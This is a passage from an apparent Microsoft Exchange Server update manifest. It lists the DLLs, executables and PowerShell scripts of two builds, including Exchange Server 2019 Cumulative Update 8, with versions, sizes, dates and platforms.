27-Apr-21| 13:23| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.858.12| 83,336| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.858.12| 50,040| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.858.12| 642,448| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.858.12| 186,248| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.858.12| 67,464| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.858.12| 56,712| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.858.12| 27,528| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.858.12| 120,712| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.858.12| 31,624| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.858.12| 57,232| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.858.12| 35,704| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.webservices.dll| 15.2.858.12| 1,054,088| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.858.12| 67,960| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.858.12| 23,416| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.858.12| 77,192| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.858.12| 17,296| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.858.12| 29,072| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.858.12| 505,224| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.858.12| 14,712| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.858.12| 36,752| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.858.12| 66,448| 27-Apr-21| 13:23| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.858.12| 19,344| 27-Apr-21| 13:24| x86 \nMicrosoft.filtering.dll| 15.2.858.12| 113,016| 27-Apr-21| 13:23| x86 \nMicrosoft.filtering.exchange.dll| 15.2.858.12| 57,224| 27-Apr-21| 13:23| x86 \nMicrosoft.filtering.interop.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:24| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.858.12| 46,984| 27-Apr-21| 13:26| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.858.12| 15,752| 27-Apr-21| 13:29| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.858.12| 23,944| 27-Apr-21| 13:25| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.858.12| 22,408| 27-Apr-21| 13:26| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.858.12| 34,704| 27-Apr-21| 13:25| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,898| 27-Apr-21| 13:23| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,274| 27-Apr-21| 13:23| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.858.12| 1,517,960| 27-Apr-21| 13:25| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.858.12| 13,200| 27-Apr-21| 13:23| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.858.12| 33,160| 27-Apr-21| 13:23| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.858.12| 18,296| 27-Apr-21| 13:25| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.858.12| 46,480| 27-Apr-21| 13:23| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.858.12| 50,552| 27-Apr-21| 13:24| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.858.12| 72,568| 27-Apr-21| 13:29| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.858.12| 541,560| 27-Apr-21| 13:25| x86 \nMicrosoft.managementgui.dll| 15.2.858.12| 133,496| 27-Apr-21| 13:29| x86 \nMicrosoft.mce.interop.dll| 15.2.858.12| 24,456| 27-Apr-21| 13:25| x86 \nMicrosoft.office.audit.dll| 15.2.858.12| 124,808| 27-Apr-21| 13:23| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.858.12| 593,288| 27-Apr-21| 13:24| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.858.12| 42,376| 27-Apr-21| 13:23| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.858.12| 217,992| 27-Apr-21| 13:23| x86 \nMicrosoft.office.compliance.console.dll| 15.2.858.12| 854,920| 27-Apr-21| 13:23| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.858.12| 485,768| 27-Apr-21| 13:24| x86 \nMicrosoft.office.compliance.core.dll| 15.2.858.12| 413,072| 27-Apr-21| 13:27| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.858.12| 36,224| 27-Apr-21| 13:26| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.858.12| 84,856| 27-Apr-21| 13:27| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.858.12| 1,782,136| 27-Apr-21| 13:23| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.858.12| 49,544| 27-Apr-21| 13:24| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.858.12| 27,528| 27-Apr-21| 13:23| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.858.12| 174,968| 27-Apr-21| 13:23| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.858.12| 165,752| 27-Apr-21| 13:24| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.858.12| 40,320| 27-Apr-21| 13:23| x86 \nMicrosoft.online.box.shell.dll| 15.2.858.12| 46,456| 27-Apr-21| 13:23| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.858.12| 67,976| 27-Apr-21| 13:23| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.858.12| 67,976| 27-Apr-21| 13:23| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.858.12| 120,184| 27-Apr-21| 13:27| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,134| 27-Apr-21| 13:26| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,064| 27-Apr-21| 13:25| Not applicable \nMovemailbox.ps1| Not applicable| 61,180| 27-Apr-21| 13:25| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,622| 27-Apr-21| 13:25| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,532| 27-Apr-21| 13:25| Not applicable \nMpgearparser.dll| 15.2.858.12| 99,728| 27-Apr-21| 13:25| x64 \nMsclassificationadapter.dll| 15.2.858.12| 248,696| 27-Apr-21| 13:29| x64 \nMsexchangecompliance.exe| 15.2.858.12| 78,712| 27-Apr-21| 13:24| x86 \nMsexchangedagmgmt.exe| 15.2.858.12| 25,464| 27-Apr-21| 13:28| x86 \nMsexchangedelivery.exe| 15.2.858.12| 38,784| 27-Apr-21| 13:28| x86 \nMsexchangefrontendtransport.exe| 15.2.858.12| 31,608| 27-Apr-21| 13:28| x86 \nMsexchangehmhost.exe| 15.2.858.12| 27,016| 27-Apr-21| 13:23| x86 \nMsexchangehmrecovery.exe| 15.2.858.12| 29,568| 27-Apr-21| 13:23| x86 \nMsexchangemailboxassistants.exe| 15.2.858.12| 72,568| 27-Apr-21| 13:24| x86 \nMsexchangemailboxreplication.exe| 15.2.858.12| 20,856| 27-Apr-21| 13:29| x86 \nMsexchangemigrationworkflow.exe| 15.2.858.12| 68,984| 27-Apr-21| 13:29| x86 \nMsexchangerepl.exe| 15.2.858.12| 71,048| 27-Apr-21| 13:28| x86 \nMsexchangesubmission.exe| 15.2.858.12| 123,280| 27-Apr-21| 13:27| x86 \nMsexchangethrottling.exe| 15.2.858.12| 39,816| 27-Apr-21| 13:29| x86 \nMsexchangetransport.exe| 15.2.858.12| 74,120| 27-Apr-21| 13:28| x86 \nMsexchangetransportlogsearch.exe| 15.2.858.12| 139,128| 27-Apr-21| 13:27| x86 \nMsexchangewatchdog.exe| 15.2.858.12| 55,696| 27-Apr-21| 13:29| x64 \nMspatchlinterop.dll| 15.2.858.12| 53,624| 27-Apr-21| 13:23| x64 \nNativehttpproxy.dll| 15.2.858.12| 91,512| 27-Apr-21| 13:29| x64 \nNavigatorparser.dll| 15.2.858.12| 636,792| 27-Apr-21| 13:25| x64 \nNego2nativeinterface.dll| 15.2.858.12| 19,320| 27-Apr-21| 13:23| x64 \nNegotiateclientcertificatemodule.dll| 15.2.858.12| 30,088| 27-Apr-21| 13:23| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,764| 27-Apr-21| 13:25| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,599| 27-Apr-21| 13:25| Not applicable \nNtspxgen.dll| 15.2.858.12| 80,776| 27-Apr-21| 13:23| x64 \nOleconverter.exe| 15.2.858.12| 173,944| 27-Apr-21| 13:28| x64 \nOutsideinmodule.dll| 15.2.858.12| 87,928| 27-Apr-21| 13:25| x64 \nOwaauth.dll| 15.2.858.12| 92,048| 27-Apr-21| 13:23| x64 \nPerf_common_extrace.dll| 15.2.858.12| 245,128| 27-Apr-21| 13:23| x64 \nPerf_exchmem.dll| 15.2.858.12| 86,392| 27-Apr-21| 13:23| x64 \nPipeline2.dll| 15.2.858.12| 1,454,456| 27-Apr-21| 13:26| x64 \nPreparemoverequesthosting.ps1| Not applicable| 70,995| 27-Apr-21| 13:25| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,249| 27-Apr-21| 13:25| Not applicable \nProductinfo.managed.dll| 15.2.858.12| 27,016| 27-Apr-21| 13:25| x86 \nProxybinclientsstringsdll| 15.2.858.12| 924,552| 27-Apr-21| 13:24| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,250| 27-Apr-21| 13:25| Not applicable \nQuietexe.exe| 15.2.858.12| 14,728| 27-Apr-21| 13:29| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,532| 27-Apr-21| 13:23| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,639| 27-Apr-21| 13:23| Not applicable \nRemoteexchange.ps1| Not applicable| 23,573| 27-Apr-21| 13:29| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,684| 27-Apr-21| 13:25| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,014| 27-Apr-21| 13:25| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,032| 27-Apr-21| 13:25| Not applicable \nReplaycrimsonmsg.dll| 15.2.858.12| 1,104,784| 27-Apr-21| 13:23| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,456| 27-Apr-21| 13:23| Not applicable \nResetcasservice.ps1| Not applicable| 21,719| 27-Apr-21| 13:25| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,085| 27-Apr-21| 13:23| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,141| 27-Apr-21| 13:27| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,194| 27-Apr-21| 13:23| Not applicable \nRightsmanagementwrapper.dll| 15.2.858.12| 86,408| 27-Apr-21| 13:27| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 27-Apr-21| 13:25| Not applicable \nRpcperf.dll| 15.2.858.12| 23,440| 27-Apr-21| 13:27| x64 \nRpcproxyshim.dll| 15.2.858.12| 39,288| 27-Apr-21| 13:25| x64 \nRulesauditmsg.dll| 15.2.858.12| 12,688| 27-Apr-21| 13:29| x64 \nSafehtmlnativewrapper.dll| 15.2.858.12| 34,704| 27-Apr-21| 13:29| x64 \nScanenginetest.exe| 15.2.858.12| 956,304| 27-Apr-21| 13:25| x64 \nScanningprocess.exe| 15.2.858.12| 738,696| 27-Apr-21| 13:26| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,832| 27-Apr-21| 13:25| Not applicable \nServicecontrol.ps1| Not applicable| 52,329| 27-Apr-21| 13:28| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,766| 27-Apr-21| 13:25| Not applicable \nSettingsadapter.dll| 15.2.858.12| 115,576| 27-Apr-21| 13:29| x64 \nSetup.exe| 15.2.858.12| 20,368| 27-Apr-21| 13:29| x86 \nSetupui.exe| 15.2.858.12| 188,304| 27-Apr-21| 13:27| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,209| 27-Apr-21| 13:25| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,847| 27-Apr-21| 13:23| Not applicable \nStatisticsutil.dll| 15.2.858.12| 142,224| 27-Apr-21| 13:25| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,133| 27-Apr-21| 13:23| Not applicable \nStoretsconstants.ps1| Not applicable| 15,814| 27-Apr-21| 13:23| Not applicable \nStoretslibrary.ps1| Not applicable| 27,987| 27-Apr-21| 13:23| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.858.12| 28,536| 27-Apr-21| 13:26| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,947| 27-Apr-21| 13:25| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,973| 27-Apr-21| 13:25| Not applicable \nTextconversionmodule.dll| 15.2.858.12| 86,416| 27-Apr-21| 13:25| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,727| 27-Apr-21| 13:23| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,413| 27-Apr-21| 13:23| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,013| 27-Apr-21| 13:23| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,457| 27-Apr-21| 13:23| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,042| 27-Apr-21| 13:26| Not applicable \nUpdatecas.ps1| Not applicable| 35,798| 27-Apr-21| 13:27| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,742| 27-Apr-21| 13:26| Not applicable \nUpdateserver.exe| 15.2.858.12| 3,014,544| 27-Apr-21| 13:25| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,176| 27-Apr-21| 13:28| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,814| 27-Apr-21| 13:27| Not applicable \nWsbexchange.exe| 15.2.858.12| 125,328| 27-Apr-21| 13:28| x64 \nX400prox.dll| 15.2.858.12| 103,312| 27-Apr-21| 13:24| x64 \n_search.lingoperators.a| 15.2.858.12| 34,696| 27-Apr-21| 13:23| Not applicable \n_search.lingoperators.b| 15.2.858.12| 34,696| 27-Apr-21| 13:23| Not applicable \n_search.mailboxoperators.a| 15.2.858.12| 290,168| 27-Apr-21| 13:23| Not applicable \n_search.mailboxoperators.b| 15.2.858.12| 290,168| 27-Apr-21| 13:23| Not applicable \n_search.operatorschema.a| 15.2.858.12| 485,752| 27-Apr-21| 13:23| Not applicable \n_search.operatorschema.b| 15.2.858.12| 485,752| 27-Apr-21| 13:23| Not applicable \n_search.tokenoperators.a| 15.2.858.12| 113,528| 27-Apr-21| 13:23| Not applicable \n_search.tokenoperators.b| 15.2.858.12| 113,528| 27-Apr-21| 13:23| Not applicable \n_search.transportoperators.a| 15.2.858.12| 67,976| 27-Apr-21| 13:23| Not applicable \n_search.transportoperators.b| 15.2.858.12| 67,976| 27-Apr-21| 13:23| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 8\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.792.15| 71,040| 27-Apr-21| 11:33| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,538| 27-Apr-21| 11:33| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,941| 27-Apr-21| 11:34| Not applicable \nAdemodule.dll| 15.2.792.15| 106,376| 27-Apr-21| 11:33| x64 \nAirfilter.dll| 15.2.792.15| 42,888| 27-Apr-21| 11:34| x64 \nAjaxcontroltoolkit.dll| 15.2.792.15| 92,560| 27-Apr-21| 11:31| x86 \nAntispamcommon.ps1| Not applicable| 13,481| 27-Apr-21| 11:34| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 27-Apr-21| 11:33| Not applicable \nAsentirs.msi| Not applicable| 77,824| 27-Apr-21| 11:35| Not applicable \nAsentsig.msi| Not applicable| 73,728| 27-Apr-21| 11:35| Not applicable \nBigfunnel.bondtypes.dll| 15.2.792.15| 45,456| 27-Apr-21| 11:33| x86 \nBigfunnel.common.dll| 15.2.792.15| 66,448| 27-Apr-21| 11:32| x86 \nBigfunnel.configuration.dll| 15.2.792.15| 118,144| 27-Apr-21| 11:32| x86 \nBigfunnel.entropy.dll| 15.2.792.15| 44,432| 27-Apr-21| 11:33| x86 \nBigfunnel.filter.dll| 15.2.792.15| 54,152| 27-Apr-21| 11:33| x86 \nBigfunnel.indexstream.dll| 15.2.792.15| 68,984| 27-Apr-21| 11:33| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,144| 27-Apr-21| 11:33| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.792.15| 19,840| 27-Apr-21| 11:32| x86 \nBigfunnel.poi.dll| 15.2.792.15| 245,112| 27-Apr-21| 11:33| x86 \nBigfunnel.postinglist.dll| 15.2.792.15| 189,328| 27-Apr-21| 11:33| x86 \nBigfunnel.query.dll| 15.2.792.15| 101,264| 27-Apr-21| 11:32| x86 \nBigfunnel.ranking.dll| 15.2.792.15| 109,456| 27-Apr-21| 11:33| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.792.15| 3,634,568| 27-Apr-21| 11:32| x86 \nBigfunnel.tracing.dll| 15.2.792.15| 42,896| 27-Apr-21| 11:32| x86 \nBigfunnel.wordbreakers.dll| 15.2.792.15| 46,472| 27-Apr-21| 11:32| x86 \nCafe_airfilter_dll| 15.2.792.15| 42,888| 27-Apr-21| 11:34| x64 \nCafe_exppw_dll| 15.2.792.15| 83,336| 27-Apr-21| 11:32| x64 \nCafe_owaauth_dll| 15.2.792.15| 92,040| 27-Apr-21| 11:33| x64 \nCalcalculation.ps1| Not applicable| 42,129| 27-Apr-21| 11:32| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,614| 27-Apr-21| 11:34| Not applicable \nChksgfiles.dll| 15.2.792.15| 57,224| 27-Apr-21| 11:33| x64 \nCitsconstants.ps1| Not applicable| 15,837| 27-Apr-21| 11:34| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 27-Apr-21| 11:33| Not applicable \nCitstypes.ps1| Not applicable| 14,476| 27-Apr-21| 11:34| Not applicable \nClassificationengine_mce| 15.2.792.15| 1,693,048| 27-Apr-21| 11:34| Not applicable \nClusmsg.dll| 15.2.792.15| 134,024| 27-Apr-21| 11:33| x64 \nCoconet.dll| 15.2.792.15| 48,016| 27-Apr-21| 11:34| x64 \nCollectovermetrics.ps1| Not applicable| 81,636| 27-Apr-21| 11:34| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,882| 27-Apr-21| 11:33| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,963| 27-Apr-21| 11:32| Not applicable \nComplianceauditservice.exe| 15.2.792.15| 39,816| 27-Apr-21| 11:32| x86 \nConfigureadam.ps1| Not applicable| 22,796| 27-Apr-21| 11:34| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,320| 27-Apr-21| 11:34| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,071| 27-Apr-21| 11:33| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,802| 27-Apr-21| 11:34| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,840| 27-Apr-21| 11:34| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,295| 27-Apr-21| 11:33| Not applicable \nConnectfunctions.ps1| Not applicable| 37,121| 27-Apr-21| 11:33| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,388| 27-Apr-21| 11:33| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,244| 27-Apr-21| 11:34| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,065| 27-Apr-21| 11:33| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,544| 27-Apr-21| 11:34| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,761| 27-Apr-21| 11:34| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,924| 27-Apr-21| 11:34| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts_exsmime.dll| 15.2.792.15| 380,792| 27-Apr-21| 11:33| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.792.15| 1,686,416| 27-Apr-21| 11:32| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 27-Apr-21| 7:41| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:33| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:33| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:33| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:32| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:33| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:32| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:33| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:31| x86 \nDagcommonlibrary.ps1| Not applicable| 60,238| 27-Apr-21| 11:34| Not applicable \nDependentassemblygenerator.exe| 15.2.792.15| 22,392| 27-Apr-21| 11:33| x86 \nDiaghelper.dll| 15.2.792.15| 66,952| 27-Apr-21| 11:33| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,366| 27-Apr-21| 11:34| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,374| 27-Apr-21| 11:34| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,201| 27-Apr-21| 11:34| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,666| 27-Apr-21| 11:33| Not applicable \nDisklockerapi.dll| Not applicable| 22,408| 27-Apr-21| 11:33| x64 \nDlmigrationmodule.psm1| Not applicable| 39,592| 27-Apr-21| 11:34| Not applicable \nDsaccessperf.dll| 15.2.792.15| 45,960| 27-Apr-21| 11:33| x64 \nDscperf.dll| 15.2.792.15| 32,648| 27-Apr-21| 11:36| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.792.15| 1,686,416| 27-Apr-21| 11:32| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.792.15| 601,488| 27-Apr-21| 11:33| x86 \nEcpperfcounters.xml| Not applicable| 31,180| 27-Apr-21| 11:35| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:32| x86 \nEdgetransport.exe| 15.2.792.15| 49,528| 27-Apr-21| 11:33| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 27-Apr-21| 7:41| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,672| 27-Apr-21| 11:33| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:34| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:34| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,672| 27-Apr-21| 11:33| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,672| 27-Apr-21| 11:32| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:34| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,688| 27-Apr-21| 11:34| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:33| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:33| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,680| 27-Apr-21| 11:33| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.792.15| 12,672| 27-Apr-21| 11:33| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,376| 27-Apr-21| 11:33| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,559| 27-Apr-21| 11:34| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,600| 27-Apr-21| 11:34| Not applicable 